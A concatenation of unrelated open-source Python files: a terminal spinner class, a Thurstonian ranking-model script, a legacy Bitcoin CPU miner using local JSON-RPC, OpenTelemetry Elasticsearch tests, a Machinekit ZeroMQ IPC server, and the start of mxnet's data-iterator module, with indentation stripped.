self.write_to_stdout = write_to_stdout
self.is_dummy = bool(yaspin is None)
if os.environ.get("ANSI_COLORS_DISABLED", False):
colorama.deinit()
super(VistirSpinner, self).__init__(*args, **kwargs)
def ok(self, text="OK", err=False):
"""Set Ok (success) finalizer to a spinner."""
# Do not display spin text for ok state
self._text = None
_text = text if text else "OK"
err = err or not self.write_to_stdout
self._freeze(_text, err=err)
def fail(self, text="FAIL", err=False):
"""Set fail finalizer to a spinner."""
# Do not display spin text for fail state
self._text = None
_text = text if text else "FAIL"
err = err or not self.write_to_stdout
self._freeze(_text, err=err)
def hide_and_write(self, text, target=None):
if not target:
target = self.stdout
from .misc import decode_for_output
if text is None or isinstance(text, six.string_types) and text == "None":
return
target.write(decode_for_output("\r"))
self._hide_cursor(target=target)
target.write(decode_for_output("{0}\n".format(text)))
target.write(CLEAR_LINE)
self._show_cursor(target=target)
def write(self, text):
if not self.write_to_stdout:
return self.write_err(text)
from .misc import to_text
sys.stdout.write("\r")
self.stdout.write(CLEAR_LINE)
if text is None:
text = ""
text = to_native_string("{0}\n".format(text))
self.stdout.write(text)
self.out_buff.write(to_text(text))
def write_err(self, text):
"""Write error text in the terminal without breaking the spinner."""
from .misc import to_text
self.stderr.write("\r")
self.stderr.write(CLEAR_LINE)
if text is None:
text = ""
text = to_native_string("{0}\n".format(text))
self.stderr.write(text)
self.out_buff.write(to_text(text))
def start(self):
if self._sigmap:
self._register_signal_handlers()
target = self.stdout if self.write_to_stdout else self.stderr
if target.isatty():
self._hide_cursor(target=target)
self._stop_spin = threading.Event()
self._hide_spin = threading.Event()
self._spin_thread = threading.Thread(target=self._spin)
self._spin_thread.start()
def stop(self):
if self._dfl_sigmap:
# Reset registered signal handlers to default ones
self._reset_signal_handlers()
if self._spin_thread:
self._stop_spin.set()
self._spin_thread.join()
target = self.stdout if self.write_to_stdout else self.stderr
if target.isatty():
target.write("\r")
if self.write_to_stdout:
self._clear_line()
else:
self._clear_err()
if target.isatty():
self._show_cursor(target=target)
if self.stderr and self.stderr != sys.stderr:
self.stderr.close()
if self.stdout and self.stdout != sys.stdout:
self.stdout.close()
self.out_buff.close()
def _freeze(self, final_text, err=False):
"""Stop spinner, compose last frame and 'freeze' it."""
if not final_text:
final_text = ""
text = to_native_string(final_text)
self._last_frame = self._compose_out(text, mode="last")
# Should be stopped here, otherwise prints after
# self._freeze call will mess up the spinner
self.stop()
if err or not self.write_to_stdout:
self.stderr.write(self._last_frame)
else:
self.stdout.write(self._last_frame)
def _compose_color_func(self):
fn = functools.partial(
colored,
color=self._color,
on_color=self._on_color,
attrs=list(self._attrs),
)
return fn
def _compose_out(self, frame, mode=None):
# Ensure Unicode input
frame = to_native_string(frame)
if self._text is None:
self._text = ""
text = to_native_string(self._text)
if self._color_func is not None:
frame = self._color_func(frame)
if self._side == "right":
frame, text = text, frame
# Mode
if not mode:
out = to_native_string("\r{0} {1}".format(frame, text))
else:
out = to_native_string("{0} {1}\n".format(frame, text))
return out
def _spin(self):
target = self.stdout if self.write_to_stdout else self.stderr
clear_fn = self._clear_line if self.write_to_stdout else self._clear_err
while not self._stop_spin.is_set():
if self._hide_spin.is_set():
# Wait a bit to avoid wasting cycles
time.sleep(self._interval)
continue
# Compose output
spin_phase = next(self._cycle)
out = self._compose_out(spin_phase)
# Write
target.write(out)
clear_fn()
target.flush()
# Wait
time.sleep(self._interval)
target.write("\b")
def _register_signal_handlers(self):
# SIGKILL cannot be caught or ignored, and the receiving
# process cannot perform any clean-up upon receiving this
# signal.
try:
if signal.SIGKILL in self._sigmap.keys():
raise ValueError(
"Trying to set handler for SIGKILL signal. "
"SIGKILL cannot be cought or ignored in POSIX systems."
)
except AttributeError:
pass
for sig, sig_handler in self._sigmap.items():
# A handler for a particular signal, once set, remains
# installed until it is explicitly reset. Store default
# signal handlers for subsequent reset at cleanup phase.
dfl_handler = signal.getsignal(sig)
self._dfl_sigmap[sig] = dfl_handler
# ``signal.SIG_DFL`` and ``signal.SIG_IGN`` are also valid
# signal handlers and are not callables.
if callable(sig_handler):
# ``signal.signal`` accepts handler function which is
# called with two arguments: signal number and the
# interrupted stack frame. ``functools.partial`` solves
# the problem of passing spinner instance into the handler
# function.
sig_handler = functools.partial(sig_handler, spinner=self)
signal.signal(sig, sig_handler)
def _reset_signal_handlers(self):
for sig, sig_handler in self._dfl_sigmap.items():
signal.signal(sig, sig_handler)
@staticmethod
def _hide_cursor(target=None):
if not target:
target = sys.stdout
cursor.hide(stream=target)
@staticmethod
def _show_cursor(target=None):
if not target:
target = sys.stdout
cursor.show(stream=target)
@staticmethod
def _clear_err():
sys.stderr.write(CLEAR_LINE)
@staticmethod
def _clear_line():
sys.stdout.write(CLEAR_LINE)
def create_spinner(*args, **kwargs):
nospin = kwargs.pop("nospin", False)
use_yaspin = kwargs.pop("use_yaspin", not nospin)
if nospin or not use_yaspin:
return DummySpinner(*args, **kwargs)
return VistirSpinner(*args, **kwargs)
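# Usage sketch (illustrative; `do_work` is a hypothetical callable): both
# spinner classes support the context-manager protocol, so a caller can do
#
#     with create_spinner(text="Resolving dependencies...") as sp:
#         do_work()
#         sp.ok("Done")  # freeze a final "Done" frame
#
# Passing nospin=True (or running without yaspin installed) yields the
# non-animated DummySpinner behaviour with the same write/ok/fail interface.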
|
set_cmdstan_loc.py
|
# -*- coding: utf-8 -*-
"""
Created on Mon May 14 11:03:18 2018
@author: pscog
"""
from PyThurstonian import thurstonian, run_sample
from simulate_data import simulate_data
import ranking as rk
import numpy as np
import pandas as pd
from multiprocessing import Process
if __name__ == '__main__':
# Load and preprocess data
K = 3  # Number of items
J = 10  # Number of participants
L = 1  # Number of trials
C = 2  # Number of conditions
beta = np.array([[0.0, 1.0, 2.0],
[0.0, 0.1, 0.2]])
data, sim_scale = simulate_data(K, J, L, C, beta = beta, seed = 4354356)
data['Subj'] = pd.factorize(data['Subj'])[0]+1
myThurst = thurstonian(design_formula = '~0+Condition', data = data, subject_name = "Subj")
myThurst.pre_sample()
P = [Process(target=run_sample, kwargs = {'temp_fnum': i}) for i in range(4)]
for p in P:
p.start()
for p in P:
p.join()
myThurst.post_sample()
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] is not None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
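# Illustrative checks of the byte-order helpers (Python 2 semantics):
#   bytereverse(0x12345678) == 0x78563412            # swap bytes in a word
#   bufreverse('\x01\x02\x03\x04') == '\x04\x03\x02\x01'
#   wordreverse('AAAABBBB') == 'BBBBAAAA'             # swap 4-byte words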
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 5322
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
test_elasticsearch.py
|
# Copyright The OpenTelemetry Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import threading
from ast import literal_eval
from unittest import mock
import elasticsearch
import elasticsearch.exceptions
from elasticsearch import Elasticsearch
from elasticsearch_dsl import Search
import opentelemetry.instrumentation.elasticsearch
from opentelemetry.instrumentation.elasticsearch import (
ElasticsearchInstrumentor,
)
from opentelemetry.test.test_base import TestBase
from opentelemetry.trace.status import StatusCanonicalCode
major_version = elasticsearch.VERSION[0]
if major_version == 7:
from . import helpers_es7 as helpers # pylint: disable=no-name-in-module
elif major_version == 6:
from . import helpers_es6 as helpers # pylint: disable=no-name-in-module
elif major_version == 5:
from . import helpers_es5 as helpers # pylint: disable=no-name-in-module
else:
from . import helpers_es2 as helpers # pylint: disable=no-name-in-module
Article = helpers.Article
@mock.patch(
"elasticsearch.connection.http_urllib3.Urllib3HttpConnection.perform_request"
)
class TestElasticsearchIntegration(TestBase):
def setUp(self):
super().setUp()
self.tracer = self.tracer_provider.get_tracer(__name__)
ElasticsearchInstrumentor().instrument()
def tearDown(self):
super().tearDown()
with self.disable_logging():
ElasticsearchInstrumentor().uninstrument()
def get_ordered_finished_spans(self):
return sorted(
self.memory_exporter.get_finished_spans(),
key=lambda s: s.start_time,
)
def test_instrumentor(self, request_mock):
request_mock.return_value = (1, {}, {})
es = Elasticsearch()
es.index(index="sw", doc_type="people", id=1, body={"name": "adam"})
spans_list = self.get_ordered_finished_spans()
self.assertEqual(len(spans_list), 1)
span = spans_list[0]
# Check version and name in span's instrumentation info
self.check_span_instrumentation_info(
span, opentelemetry.instrumentation.elasticsearch
)
# check that no spans are generated after uninstrument
ElasticsearchInstrumentor().uninstrument()
es.index(index="sw", doc_type="people", id=1, body={"name": "adam"})
spans_list = self.get_ordered_finished_spans()
self.assertEqual(len(spans_list), 1)
def test_span_not_recording(self, request_mock):
request_mock.return_value = (1, {}, {})
mock_tracer = mock.Mock()
mock_span = mock.Mock()
mock_span.is_recording.return_value = False
mock_tracer.start_span.return_value = mock_span
mock_tracer.use_span.return_value.__enter__ = mock_span
mock_tracer.use_span.return_value.__exit__ = mock_span
with mock.patch("opentelemetry.trace.get_tracer") as tracer:
tracer.return_value = mock_tracer
Elasticsearch()
self.assertFalse(mock_span.is_recording())
self.assertTrue(mock_span.is_recording.called)
self.assertFalse(mock_span.set_attribute.called)
self.assertFalse(mock_span.set_status.called)
ElasticsearchInstrumentor().uninstrument()
def test_prefix_arg(self, request_mock):
prefix = "prefix-from-args"
ElasticsearchInstrumentor().uninstrument()
ElasticsearchInstrumentor(span_name_prefix=prefix).instrument()
request_mock.return_value = (1, {}, {})
self._test_prefix(prefix)
def test_prefix_env(self, request_mock):
prefix = "prefix-from-env"
env_var = "OTEL_PYTHON_ELASTICSEARCH_NAME_PREFIX"
os.environ[env_var] = prefix
ElasticsearchInstrumentor().uninstrument()
ElasticsearchInstrumentor().instrument()
request_mock.return_value = (1, {}, {})
del os.environ[env_var]
self._test_prefix(prefix)
def _test_prefix(self, prefix):
es = Elasticsearch()
es.index(index="sw", doc_type="people", id=1, body={"name": "adam"})
spans_list = self.get_ordered_finished_spans()
self.assertEqual(len(spans_list), 1)
span = spans_list[0]
self.assertTrue(span.name.startswith(prefix))
def test_result_values(self, request_mock):
request_mock.return_value = (
1,
{},
'{"found": false, "timed_out": true, "took": 7}',
)
es = Elasticsearch()
es.get(index="test-index", doc_type="tweet", id=1)
spans = self.get_ordered_finished_spans()
self.assertEqual(1, len(spans))
self.assertEqual("False", spans[0].attributes["elasticsearch.found"])
self.assertEqual(
"True", spans[0].attributes["elasticsearch.timed_out"]
)
self.assertEqual("7", spans[0].attributes["elasticsearch.took"])
def test_trace_error_unknown(self, request_mock):
exc = RuntimeError("custom error")
request_mock.side_effect = exc
self._test_trace_error(StatusCanonicalCode.UNKNOWN, exc)
def test_trace_error_not_found(self, request_mock):
msg = "record not found"
exc = elasticsearch.exceptions.NotFoundError(404, msg)
request_mock.return_value = (1, {}, {})
request_mock.side_effect = exc
self._test_trace_error(StatusCanonicalCode.NOT_FOUND, exc)
def _test_trace_error(self, code, exc):
es = Elasticsearch()
try:
es.get(index="test-index", doc_type="tweet", id=1)
except Exception: # pylint: disable=broad-except
pass
spans = self.get_ordered_finished_spans()
self.assertEqual(1, len(spans))
span = spans[0]
self.assertFalse(span.status.is_ok)
self.assertEqual(span.status.canonical_code, code)
self.assertEqual(span.status.description, str(exc))
def test_parent(self, request_mock):
request_mock.return_value = (1, {}, {})
es = Elasticsearch()
with self.tracer.start_as_current_span("parent"):
es.index(
index="sw", doc_type="people", id=1, body={"name": "adam"}
)
spans = self.get_ordered_finished_spans()
self.assertEqual(len(spans), 2)
self.assertEqual(spans[0].name, "parent")
self.assertEqual(spans[1].name, "Elasticsearch/sw/people/1")
self.assertIsNotNone(spans[1].parent)
self.assertEqual(spans[1].parent.span_id, spans[0].context.span_id)
def test_multithread(self, request_mock):
request_mock.return_value = (1, {}, {})
es = Elasticsearch()
ev = threading.Event()
# 1. Start tracing from thread-1; make thread-2 wait
# 2. Trace something from thread-2, make thread-1 join before finishing.
# 3. Check the spans got different parents, and are in the expected order.
def target1(parent_span):
with self.tracer.use_span(parent_span):
es.get(index="test-index", doc_type="tweet", id=1)
ev.set()
ev.wait()
def target2():
ev.wait()
es.get(index="test-index", doc_type="tweet", id=2)
ev.set()
with self.tracer.start_as_current_span("parent") as span:
t1 = threading.Thread(target=target1, args=(span,))
t1.start()
t2 = threading.Thread(target=target2)
t2.start()
t1.join()
t2.join()
spans = self.get_ordered_finished_spans()
self.assertEqual(3, len(spans))
s1, s2, s3 = spans
self.assertEqual(s1.name, "parent")
self.assertEqual(s2.name, "Elasticsearch/test-index/tweet/1")
self.assertIsNotNone(s2.parent)
self.assertEqual(s2.parent.span_id, s1.context.span_id)
self.assertEqual(s3.name, "Elasticsearch/test-index/tweet/2")
self.assertIsNone(s3.parent)
def test_dsl_search(self, request_mock):
request_mock.return_value = (1, {}, '{"hits": {"hits": []}}')
client = Elasticsearch()
search = Search(using=client, index="test-index").filter(
"term", author="testing"
)
search.execute()
spans = self.get_ordered_finished_spans()
span = spans[0]
self.assertEqual(1, len(spans))
self.assertEqual(span.name, "Elasticsearch/test-index/_search")
self.assertIsNotNone(span.end_time)
self.assertEqual(
span.attributes,
{
"component": "elasticsearch-py",
"db.type": "elasticsearch",
"elasticsearch.url": "/test-index/_search",
"elasticsearch.method": helpers.dsl_search_method,
"db.statement": str(
{
"query": {
"bool": {
"filter": [{"term": {"author": "testing"}}]
}
}
}
),
},
)
def test_dsl_create(self, request_mock):
request_mock.return_value = (1, {}, {})
client = Elasticsearch()
Article.init(using=client)
spans = self.get_ordered_finished_spans()
self.assertEqual(2, len(spans))
span1, span2 = spans
self.assertEqual(span1.name, "Elasticsearch/test-index")
self.assertEqual(
span1.attributes,
{
"component": "elasticsearch-py",
"db.type": "elasticsearch",
"elasticsearch.url": "/test-index",
"elasticsearch.method": "HEAD",
},
)
self.assertEqual(span2.name, "Elasticsearch/test-index")
attributes = {
"component": "elasticsearch-py",
"db.type": "elasticsearch",
"elasticsearch.url": "/test-index",
"elasticsearch.method": "PUT",
}
self.assert_span_has_attributes(span2, attributes)
self.assertEqual(
literal_eval(span2.attributes["db.statement"]),
helpers.dsl_create_statement,
)
def test_dsl_index(self, request_mock):
request_mock.return_value = helpers.dsl_index_result
client = Elasticsearch()
article = Article(
meta={"id": 2},
title="About searching",
body="A few words here, a few words there",
)
res = article.save(using=client)
self.assertTrue(res)
spans = self.get_ordered_finished_spans()
self.assertEqual(1, len(spans))
span = spans[0]
self.assertEqual(span.name, helpers.dsl_index_span_name)
attributes = {
"component": "elasticsearch-py",
"db.type": "elasticsearch",
"elasticsearch.url": helpers.dsl_index_url,
"elasticsearch.method": "PUT",
}
self.assert_span_has_attributes(span, attributes)
self.assertEqual(
literal_eval(span.attributes["db.statement"]),
{
"body": "A few words here, a few words there",
"title": "About searching",
},
)
|
ipc-server.py
|
#!/usr/bin/env python
import sys
import os
import time
import threading
import zmq
# Machinekit specific, can only use on local machine
from machinekit import config
# Machinetalk bindings
from pymachinetalk.dns_sd import ServiceDiscovery, ServiceDiscoveryFilter
from pymachinetalk.application import ApplicationStatus
from pymachinetalk.application import ApplicationCommand
import pymachinetalk.application as application
from ipcmsg_pb2 import *
if sys.version_info >= (3, 0):
import configparser
else:
import ConfigParser as configparser
class IPCServer:
def __init__(self, uuid, debug=True):
self.debug = debug
self.threads = []
self.shutdown = threading.Event()
sd_filter = ServiceDiscoveryFilter(txt_records={'uuid': uuid})
self.sd = ServiceDiscovery(filter_=sd_filter)
self.status = ApplicationStatus()
self.command = ApplicationCommand()
self.sd.register(self.status)
self.sd.register(self.command)
# create ipc sockets
context = zmq.Context()
context.linger = 0
self.context = context
# self.pubSocket = context.socket(zmq.PUB)
# self.pubSocket.bind('ipc://machinetalk-server.ipc')
# self.pubDsname = self.pubSocket.get_string(zmq.LAST_ENDPOINT, encoding='utf-8')
# if self.debug:
# print('bound PUB socket to %s' % self.pubDsname)
self.zmqSocket = context.socket(zmq.ROUTER)
self.zmqSocket.bind('ipc://machinetalk-server.ipc')
self.zmqDsname = self.zmqSocket.get_string(zmq.LAST_ENDPOINT, encoding='utf-8')
if self.debug:
print('bound ROUTER socket to %s' % self.zmqDsname)
self.zmqLock = threading.Lock()
self._tx = Message()
self._rx = Message()
self.threads.append(threading.Thread(target=self.socket_worker))
for thread in self.threads:
thread.start()
def send_msg(self, identity, msg_type):
with self.zmqLock:
self._tx.type = msg_type
txBuffer = self._tx.SerializeToString()
self.zmqSocket.send_multipart([identity, txBuffer], zmq.NOBLOCK)
self._tx.Clear()
def socket_worker(self):
poll = zmq.Poller()
poll.register(self.zmqSocket, zmq.POLLIN)
while not self.shutdown.is_set():
s = dict(poll.poll(200))
if self.zmqSocket in s and s[self.zmqSocket] == zmq.POLLIN:
self.process_msg(self.zmqSocket)
def process_msg(self, socket):
(identity, message) = socket.recv_multipart()
self._rx.ParseFromString(message)
if self.debug:
print("process message called, id: %s" % identity)
print(str(self._rx))
if self._rx.type == IPC_POSITION:
self._tx.x = (
self.status.motion.position.x
- self.status.motion.g5x_offset.x
- self.status.motion.g92_offset.x
- self.status.io.tool_offset.x
)
self._tx.y = (
self.status.motion.position.y
- self.status.motion.g5x_offset.y
- self.status.motion.g92_offset.y
- self.status.io.tool_offset.y
)
self.send_msg(identity, IPC_POSITION)
elif self._rx.type == IPC_JOG:
self.command.set_task_mode(application.EMC_TASK_MODE_MANUAL)
self.command.jog(
self._rx.jog_type, self._rx.axis, self._rx.velocity, self._rx.distance
)
elif self._rx.type == IPC_CONNECTED:
self._tx.connected = self.status.synced and self.command.connected
self.send_msg(identity, IPC_CONNECTED)
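# Client-side sketch (illustrative; assumes the same ipcmsg_pb2 Message
# definitions). A DEALER socket pairs with the ROUTER above: its single-frame
# send arrives here as (identity, message), and the reply comes back as one
# frame.
#
#     ctx = zmq.Context()
#     sock = ctx.socket(zmq.DEALER)
#     sock.connect('ipc://machinetalk-server.ipc')
#     req = Message()
#     req.type = IPC_POSITION
#     sock.send(req.SerializeToString())
#     reply = Message()
#     reply.ParseFromString(sock.recv())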
def start(self):
self.sd.start()
def stop(self):
self.sd.stop()
self.shutdown.set()
for thread in self.threads:
thread.join()
self.threads = []
def main():
mkconfig = config.Config()
mkini = os.getenv("MACHINEKIT_INI")
if mkini is None:
mkini = mkconfig.MACHINEKIT_INI
if not os.path.isfile(mkini):
sys.stderr.write("MACHINEKIT_INI " + mkini + " does not exist\n")
sys.exit(1)
mki = configparser.ConfigParser()
mki.read(mkini)
uuid = mki.get("MACHINEKIT", "MKUUID")
# remote = mki.getint("MACHINEKIT", "REMOTE")
ipcServer = IPCServer(uuid=uuid)
ipcServer.start()
try:
while True:
time.sleep(0.5)
except KeyboardInterrupt:
pass
print("stopping threads")
ipcServer.stop()
# wait for all threads to terminate
while threading.active_count() > 1:
time.sleep(0.1)
print("threads stopped")
sys.exit(0)
if __name__ == "__main__":
main()
|
io.py
|
# coding: utf-8
# pylint: disable=invalid-name, protected-access, fixme, too-many-arguments, W0221, W0201, no-self-use, no-member
"""NDArray interface of mxnet"""
from __future__ import absolute_import
from collections import OrderedDict, namedtuple
import sys
import ctypes
import logging
import threading
import numpy as np
from .base import _LIB
from .base import c_array, c_str, mx_uint, py_str
from .base import DataIterHandle, NDArrayHandle
from .base import mx_real_t
from .base import check_call, build_param_doc as _build_param_doc
from .ndarray import NDArray
from .ndarray import array
from .ndarray import concatenate
# pylint: disable=W0622
class DataDesc(namedtuple('DataDesc', ['name', 'shape'])):
"""Named data desc description contains name, shape, type and other extended attributes.
"""
def __new__(cls, name, shape, dtype=mx_real_t, layout='NCHW'):
ret = super(DataDesc, cls).__new__(cls, name, shape)
ret.dtype = dtype
ret.layout = layout
return ret
def __repr__(self):
return "DataDesc[%s,%s,%s,%s]" % (self.name, self.shape, self.dtype,
self.layout)
@staticmethod
def get_batch_axis(layout):
"""Get the dimension that corresponds to the batch size.
Parameters
----------
layout : str
layout string. For example, "NCHW".
Returns
-------
An axis indicating the batch_size dimension. When data-parallelism is
used, the data will be automatically split and concatenate along the batch_size
dimension. Axis can be -1, which means the whole array will be copied for each
data-parallelism device.
"""
if layout is None:
return 0
return layout.find('N')
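# Illustrative (not from the original source): get_batch_axis('NCHW') -> 0,
# get_batch_axis('TNC') -> 1, get_batch_axis(None) -> 0.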
@staticmethod
def get_list(shapes, types):
"""Get DataDesc list from attribute lists.
Parameters
----------
shapes : shape tuple list with (name, shape) tuples
types : type tuple list with (name, type) tuples
"""
if types is not None:
type_dict = dict(types)
return [DataDesc(x[0], x[1], type_dict[x[0]]) for x in shapes]
else:
return [DataDesc(x[0], x[1]) for x in shapes]
class DataBatch(object):
"""Default object for holding a mini-batch of data and related information."""
def __init__(self, data, label, pad=None, index=None,
bucket_key=None, provide_data=None, provide_label=None):
self.data = data
self.label = label
self.pad = pad
self.index = index
# the following properties are only used when bucketing is used
self.bucket_key = bucket_key
self.provide_data = provide_data
self.provide_label = provide_label
class DataIter(object):
"""DataIter object in mxnet. """
def __init__(self):
self.batch_size = 0
def __iter__(self):
return self
def reset(self):
"""Reset the iterator. """
pass
def next(self):
"""Get next data batch from iterator. Equivalent to
self.iter_next()
DataBatch(self.getdata(), self.getlabel(), self.getpad(), None)
Returns
-------
data : DataBatch
The data of next batch.
"""
if self.iter_next():
return DataBatch(data=self.getdata(), label=self.getlabel(), \
pad=self.getpad(), index=self.getindex())
else:
raise StopIteration
def __next__(self):
return self.next()
def iter_next(self):
"""Iterate to next batch.
Returns
-------
has_next : boolean
Whether the move is successful.
"""
pass
def getdata(self):
"""Get data of current batch.
Returns
-------
data : NDArray
The data of current batch.
"""
pass
def getlabel(self):
"""Get label of current batch.
Returns
-------
label : NDArray
The label of current batch.
"""
pass
def getindex(self):
"""Get index of the current batch.
Returns
-------
index : numpy.array
The index of current batch
"""
return None
def getpad(self):
"""Get the number of padding examples in current batch.
Returns
-------
pad : int
Number of padding examples in current batch
"""
pass
class ResizeIter(DataIter):
"""Resize a DataIter to given number of batches per epoch.
May produce incomplete batch in the middle of an epoch due
to padding from internal iterator.
Parameters
----------
data_iter : DataIter
Internal data iterator.
size : number of batches per epoch to resize to.
reset_internal : whether to reset internal iterator on ResizeIter.reset
"""
def __init__(self, data_iter, size, reset_internal=True):
super(ResizeIter, self).__init__()
self.data_iter = data_iter
self.size = size
self.reset_internal = reset_internal
self.cur = 0
self.current_batch = None
self.provide_data = data_iter.provide_data
self.provide_label = data_iter.provide_label
self.batch_size = data_iter.batch_size
def reset(self):
self.cur = 0
if self.reset_internal:
self.data_iter.reset()
def iter_next(self):
if self.cur == self.size:
return False
try:
self.current_batch = self.data_iter.next()
except StopIteration:
self.data_iter.reset()
self.current_batch = self.data_iter.next()
self.cur += 1
return True
def getdata(self):
return self.current_batch.data
def getlabel(self):
return self.current_batch.label
def getindex(self):
return self.current_batch.index
def getpad(self):
return self.current_batch.pad
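# Illustrative sketch: ResizeIter fixes the number of batches per epoch,
# resetting the underlying iterator as needed. base_iter is a hypothetical
# DataIter.
#
#   resized = ResizeIter(base_iter, size=100)
#   batches = sum(1 for _ in resized)    # -> 100, regardless of len(base_iter)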
class PrefetchingIter(DataIter):
"""Base class for prefetching iterators. Takes one or more DataIters (
or any class with "reset" and "next" methods) and combine them with
prefetching. For example:
Parameters
----------
iters : DataIter or list of DataIter
one or more DataIters (or any class with "reset" and "next" methods)
rename_data : None or list of dict
i-th element is a renaming map for i-th iter, in the form of
{'original_name' : 'new_name'}. Should have one entry for each entry
in iter[i].provide_data
rename_label : None or list of dict
Similar to rename_data
Examples
--------
iter = PrefetchingIter([NDArrayIter({'data': X1}), NDArrayIter({'data': X2})],
rename_data=[{'data': 'data1'}, {'data': 'data2'}])
"""
def __init__(self, iters, rename_data=None, rename_label=None):
super(PrefetchingIter, self).__init__()
if not isinstance(iters, list):
iters = [iters]
self.n_iter = len(iters)
assert self.n_iter > 0
self.iters = iters
self.rename_data = rename_data
self.rename_label = rename_label
self.batch_size = self.provide_data[0][1][0]
self.data_ready = [threading.Event() for i in range(self.n_iter)]
self.data_taken = [threading.Event() for i in range(self.n_iter)]
for e in self.data_taken:
e.set()
self.started = True
